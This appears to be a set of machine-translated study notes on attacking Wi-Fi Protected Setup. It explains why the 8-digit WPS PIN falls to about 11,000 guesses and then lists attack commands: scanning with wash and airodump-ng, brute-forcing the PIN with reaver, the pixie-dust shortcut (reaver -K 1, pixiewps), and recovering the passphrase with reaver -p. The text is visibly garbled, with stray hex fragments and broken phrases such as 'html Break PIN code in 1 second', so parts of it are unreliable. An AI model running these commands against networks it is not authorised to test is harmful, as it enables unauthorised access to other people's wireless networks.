WPS (WIRELESS PROTECTED SETUP)
- WPS is a technology developed by the WIFI Alliance in 2006.
- simplifies the operation of wireless access through PIN codes. There is no need to remember PSK
- routers and network cards each press a button to access wireless
- The PIN code is Divided into 2 segments of 4 digits each, a total of 8 digits
- Security vulnerability
- PSK: 218,340,105,854,896
- A security-related vulnerability was discovered in 2011
- The access initiator can judge whether the first 4 digits are correct based on the return information of the router
- and the last 4 of the PIN code There are only 1,000 defined combinations (the last one is checksum)
- so all exhaustive cracking only requires 11,000 attempts
- The standard itself does not design a locking mechanism. Currently, multiple manufacturers have implemented the locking mechanism
- Many manufacturers including Linksys The wireless router cannot turn off the WPS function
- Even if WPS is turned off in the WEB interface, the configuration will not take effect
- The attack difficulty is relatively low, but the defense is very difficult
- Generally, the password can be cracked within 4-10 hours
- PSK
- Use a computer to directly calculate the PIN
- C83A35
- 00B00C
actual After the process
- starts the listening mode, it is found that the AP
- wash -i wlan0mon# or
airodump-ng wlan0mon --wps
- blasts the PIN code
reaver -i wlan0mon -b AP mac -vv
- html Break PIN code in 1 second
reaver -i wlan0mon -b AP mac -vv -K 1
pixiewps
- only uses chips from fixed manufacturers, and the success rate is very low.
- After getting the PIN code, you can continue to crack
reaver -i wlan0mon -b AP mac -vv -p[PIN code]
Problem: 1